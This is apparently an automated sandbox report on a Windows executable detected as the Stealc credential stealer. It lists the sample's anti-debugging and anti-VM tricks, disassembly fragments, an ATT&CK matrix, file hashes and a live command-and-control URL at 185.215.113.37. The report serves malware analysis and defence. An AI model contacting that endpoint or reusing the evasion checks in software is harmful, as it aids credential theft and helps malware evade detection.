                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193F16 second address: 1193F2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3971C77Eh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193F2B second address: 1193F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBD38EF6194h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBD38EF6172h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119423C second address: 1194241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11943E2 second address: 1194416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38EF6177h 0x00000009 jmp 00007FBD38EF6179h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194416 second address: 1194441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C783h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBD3971C77Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11972C7 second address: 11972FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBD38EF6179h 0x0000000d jns 00007FBD38EF6166h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 ja 00007FBD38EF6166h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11972FC second address: 1197301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197301 second address: 119730B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD38EF616Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119735A second address: 1197364 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197364 second address: 119736A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119736A second address: 1197395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, ebx 0x0000000d push 00000004h 0x0000000f jc 00007FBD3971C77Ch 0x00000015 push 40F2DA42h 0x0000001a jp 00007FBD3971C780h 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11975FD second address: 1197603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197603 second address: 1197607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197607 second address: 1197621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007FBD38EF616Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197621 second address: 1197625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197625 second address: 1197650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D37E6h] 0x0000000e mov dword ptr [ebp+122D28B8h], ebx 0x00000014 push dword ptr [ebp+122D1C45h] 0x0000001a mov edx, ecx 0x0000001c call 00007FBD38EF6169h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197650 second address: 119765A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119765A second address: 119765F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BF80 second address: 119BF8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BF8D second address: 119BF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Bh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BF9F second address: 119BFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BFA5 second address: 119BFAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800315 second address: 5800319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800319 second address: 580036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FBD38EF6175h 0x0000000f xor esi, 4AD1E496h 0x00000015 jmp 00007FBD38EF6171h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBD38EF6178h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580036C second address: 5800394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBD3971C785h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800394 second address: 58003A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38EF616Ch 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F119BD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F11ABC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10D7F31 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 113F6A3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00CC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00CBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00CBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00CC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00CBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00CC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00CBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CBDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB1160 GetSystemInfo,ExitProcess,0_2_00CB1160
                Source: file.exe, file.exe, 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1706114024.00000000018F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO[dc
                Source: file.exe, 00000000.00000002.1706114024.00000000018C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1706114024.00000000018F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13567
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13552
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13555
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13572
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13607
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB45C0 VirtualProtect ?,00000004,00000100,000000000_2_00CB45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CC9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC9750 mov eax, dword ptr fs:[00000030h]0_2_00CC9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00CC78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2004, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00CC9600
                Source: file.exe, file.exe, 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00CC7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00CC7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00CC7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00CC7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.cb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2004, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.cb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2004, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php4&nefile.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37eEfile.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.373hfile.exe, 00000000.00000002.1706114024.00000000018D9000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpd&file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1531318
                        Start date and time:2024-10-11 01:49:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 86
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.947124524590918
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'825'280 bytes
                        MD5:9c7193e94b13d7380dccc18b19a95158
                        SHA1:4d69fe7afa38cf9fa65fd5acd25e66bc6ad230b4
                        SHA256:480374d99e5a098171a92a8b09b3a6fb5a43c216e21d328e6c17d87b5d12c2f0
                        SHA512:d977e3e34f8836febbba2075eab4ca09039544c30faba66c72feb97cbdece7ccbebd63e1b5e2163719039fe3cc7eb22c61252d45e1288e6fca9788eb18256162
                        SSDEEP:49152:o5vJL1QxKSx27FwopjOCKGZn8UDIyWEz5:eXvS+ljO1GFsyFz
                        TLSH:1C85330F9E577EA0D84E1537DCDBD34B5B38A84C82EB31A514483EE8A16F530B0B7969
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0xa8e000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007FBD38CF167Ah
                        popcnt ebx, dword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [ebx], al
                        or al, byte ptr [eax]
